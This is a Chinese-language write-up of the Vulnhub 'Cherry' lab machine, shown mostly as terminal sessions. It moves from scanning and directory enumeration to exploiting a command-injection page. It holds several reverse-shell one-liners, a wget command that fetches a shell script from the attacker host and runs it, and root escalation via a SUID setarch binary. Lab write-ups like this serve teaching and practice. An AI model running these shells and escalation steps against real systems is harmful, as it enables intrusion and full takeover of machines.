Vulnhub Cherry靶机解题详细过程
Cherry
识别目标主机IP地址
靶机存在无法从Virtualbox自动获取IP地址的问题,先参照本人另文解决该问题。
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.61.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.100 08:00:27:49:52:e5 2 120 PCS Systemtechnik GmbH
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.178 08:00:27:77:6a:45 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.178
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.178 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 06:17 EST
Nmap scan report for bogon (192.168.56.178)
Host is up (0.00028s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 8b:c6:f5:6e:2c:a2:95:13:a5:10:84:a5:0c:83:b7:ae (RSA)
| 256 38:d8:23:06:3e:86:2a:c9:0f:16:3f:23:93:d9:a1:06 (ECDSA)
|_ 256 95:b9:d4:f0:98:4a:d9:09:90:a4:5d:a7:9d:6d:ce:76 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Cherry
|_http-server-header: nginx/1.18.0 (Ubuntu)
7755/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Cherry
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port33060-TCP:V=7.92%I=7%D=11/15%Time=63737556%P=x86_64-pc-linux-gnu%r(
SF:NULL,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(GenericLines,9,"\x05\0\0\0\x0b
SF:\x08\x05\x1a\0")%r(GetRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(HTTPO
SF:ptions,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(RTSPRequest,9,"\x05\0\0\0\x0
SF:b\x08\x05\x1a\0")%r(RPCCheck,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSVer
SF:sionBindReqTCP,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(DNSStatusRequestTCP,
SF:2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0f
SF:Invalid\x20message\"\x05HY000")%r(Help,9,"\x05\0\0\0\x0b\x08\x05\x1a\0"
SF:)%r(SSLSessionReq,2B,"\x05\0\0\0\x0b\x08\x05\x1a\0\x1e\0\0\0\x01\x08\x0
SF:1\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY000")%r(TerminalServerCooki
SF:e,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(TLSSessionReq,2B,"\x05\0\0\0\x0b\
SF:x08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\
SF:"\x05HY000")%r(Kerberos,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SMBProgNeg,
SF:9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(X11Probe,2B,"\x05\0\0\0\x0b\x08\x05
SF:\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY
SF:000")%r(FourOhFourRequest,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LPDString
SF:,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LDAPSearchReq,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(LDAPBindReq,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(SIPOption
SF:s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(LANDesk-RC,9,"\x05\0\0\0\x0b\x08\
SF:x05\x1a\0")%r(TerminalServer,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NCP,9,
SF:"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(NotesRPC,2B,"\x05\0\0\0\x0b\x08\x05\x
SF:1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"\x05HY00
SF:0")%r(JavaRMI,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(WMSRequest,9,"\x05\0\
SF:0\0\x0b\x08\x05\x1a\0")%r(oracle-tns,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%
SF:r(ms-sql-s,9,"\x05\0\0\0\x0b\x08\x05\x1a\0")%r(afp,2B,"\x05\0\0\0\x0b\x
SF:08\x05\x1a\0\x1e\0\0\0\x01\x08\x01\x10\x88'\x1a\x0fInvalid\x20message\"
SF:\x05HY000")%r(giop,9,"\x05\0\0\0\x0b\x08\x05\x1a\0");
MAC Address: 08:00:27:77:6A:45 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.66 seconds
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178
<html>
<body bgcolor="white">
<head>
<title>Cherry</title>
<meta name="description" content="We Are Still Alive!">
<meta name="keywords" content="Hacked by Ind_C0d3r">
<meta name="robots" content="index, follow">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="language" content="English">
</head>
<link href="https://fonts.googleapis.com/css?family=Righteous|Saira+Stencil+One&display=swap" rel="stylesheet">
<style type="text/css">
@font-face {
font-family: 'Righteous', cursive;
font-family: 'Saira Stencil One', cursive;
}
</style>
<center><br><br>
<img src="img.jpg" width="800px" height="800px"><br>
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ ls
img.jpg nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ steghide extract -sf img.jpg
Enter passphrase:
steghide: could not extract any data with that passphrase!
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ stegseek img.jpg /usr/share/wordlists/rockyou.txt
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Progress: 99.75% (133.1 MB)
[!] error: Could not find a valid passphrase.
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/robots.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/15 06:21:55 Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 178] [--> http://192.168.56.178/backup/]
Progress: 215269 / 220561 (97.60%)===============================================================
2022/11/15 06:22:12 Finished
===============================================================
但是目录禁止访问:
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178/backup
<html>
<head><title>301 Moved Permanently</title></head>
<body>
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.18.0 (Ubuntu)</center>
</body>
</html>
继续对这个目录进行深挖,可能存在问题
──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178/backup -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178/backup
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,php,html,txt
[+] Timeout: 10s
===============================================================
2022/11/15 06:25:19 Starting gobuster in directory enumeration mode
===============================================================
/command.php (Status: 200) [Size: 293]
Progress: 473294 / 1102805 (42.92%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/15 06:25:56 Finished
===============================================================
但是发现80端口无法正常解析php文件,那么看下一个端口:
──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178:7755 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178:7755
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/15 06:32:34 Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 324] [--> http://192.168.56.178:7755/backup/]
Progress: 23352 / 220561 (10.59%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/15 06:32:36 Finished
看到7755端口同样有/backup目录,类似的扫描文件
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ gobuster dir -u http://192.168.56.178:7755/backup -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.178:7755/backup
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Extensions: sh,txt,php,html
[+] Timeout: 10s
===============================================================
2022/11/15 06:33:40 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 281]
/.html (Status: 403) [Size: 281]
/command.php (Status: 200) [Size: 252]
Progress: 82483 / 1102805 (7.48%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2022/11/15 06:33:45 Finished
======================================
这次看一下能否正常访问command.php
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178:7755/backup/command.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>
这里提示要传参backup,看能不能正常执行命令
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ curl http://192.168.56.178:7755/backup/command.php?backup=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Backup</title>
</head>
<body>
<!-- </?php echo passthru($_GET['backup']); ?/> -->
</body>
</html>
但是浏览器访问可以正常执行并得到返回结果,有点奇怪,抓包试试,没有明显问题,估计是不是目标对请求头进行了检查,先搁置这个,目前已经可以正常执行命令,接下来设法得到shell:
试了以下建立shell的方法都不对
bash -c 'bash -i >& /dev/tcp/192.168.56.137/5555 0>&1'
nc -e /bin/sh 192.168.56.137 5555
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.137 5555 >/tmp/f
换种方法,在本地编辑好shell.sh脚本,然后上传
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/192.168.56.137/5555 0>&1
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
注意在靶机要下载到/tmp目录
http://192.168.56.178:7755/backup/command.php?backup=wget%20-O%20/tmp/shell.sh%20http://192.168.56.137:8000/shell.sh
检查是否上传成功:
http://192.168.56.178:7755/backup/command.php?backup=ls%20/tmp
执行该该脚本:
http://192.168.56.178:7755/backup/command.php?backup=bash%20/tmp/shell.sh
在Kali上成功得到反弹的shell
┌──(kali㉿kali)-[~/Vulnhub/Cherry]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.178] 35692
bash: cannot set terminal process group (831): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cherry:/var/www/html/backup$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cherry:/var/www/html/backup$
提权
www-data@cherry:/var/www/html/backup$ find / -type f -perm /4000 2>/dev/null
find / -type f -perm /4000 2>/dev/null
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/at
/usr/bin/mount
/usr/bin/setarch
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/passwd
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/snap/snapd/8542/usr/lib/snapd/snap-confine
/snap/core18/1880/bin/mount
/snap/core18/1880/bin/ping
/snap/core18/1880/bin/su
/snap/core18/1880/bin/umount
/snap/core18/1880/usr/bin/chfn
/snap/core18/1880/usr/bin/chsh
/snap/core18/1880/usr/bin/gpasswd
/snap/core18/1880/usr/bin/newgrp
/snap/core18/1880/usr/bin/passwd
/snap/core18/1880/usr/bin/sudo
/snap/core18/1880/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1880/usr/lib/openssh/ssh-keysign
www-data@cherry:/var/www/html/backup$ ls -alh /usr/bin/setarch
ls -alh /usr/bin/setarch
-rwsr-sr-x 1 root root 27K Apr 2 2020 /usr/bin/setarch
www-data@cherry:/var/www/html/backup$ /usr/bin/setarch $(arch) /bin/sh -p
/usr/bin/setarch $(arch) /bin/sh -p
id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
cd /root
ls -alh
total 44K
drwx------ 5 root root 4.0K Sep 7 2020 .
drwxr-xr-x 20 root root 4.0K Sep 7 2020 ..
-rw------- 1 root root 164 Sep 7 2020 .bash_history
-rw-r--r-- 1 root root 3.1K Dec 5 2019 .bashrc
drwxr-xr-x 3 root root 4.0K Sep 7 2020 .local
-rw------- 1 root root 18 Sep 7 2020 .mysql_history
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
drwx------ 2 root root 4.0K Sep 7 2020 .ssh
-rw-r--r-- 1 root root 255 Sep 7 2020 .wget-hsts
-rw-r--r-- 1 root root 46 Sep 7 2020 proof.txt
drwxr-xr-x 3 root root 4.0K Sep 7 2020 snap
cat proof.txt
Sun_CSR_TEAM.af6d45da1f1181347b9e2139f23c6a5b
成功读取root flag!!!
STRIVE FOR PROGRESS,NOT FOR PERFECTION
